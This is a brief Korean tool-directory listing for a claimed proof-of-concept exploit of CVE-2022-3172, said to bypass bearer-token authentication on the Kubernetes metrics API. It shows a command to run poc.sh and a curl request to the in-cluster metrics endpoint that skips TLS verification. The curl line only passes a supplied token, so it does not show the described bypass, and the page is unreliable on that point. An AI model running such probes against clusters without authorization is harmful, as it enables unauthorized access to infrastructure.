해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!
CVE-2022-3172에 대한 개념 증명 익스플로잇으로, 베어러 토큰 인증 우회를 통해 Kubernetes 메트릭 API에 무단 액세스하는 방법을 보여줍니다.
커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.
모든 도구 탐색
도구 컬렉션을 둘러보세요
chmod +x poc.sh ./poc.sh
curl https://kubernetes.default.svc/apis/metrics.k8s.io/v2beta1/ -k -H "Authorization: Bearer {token}"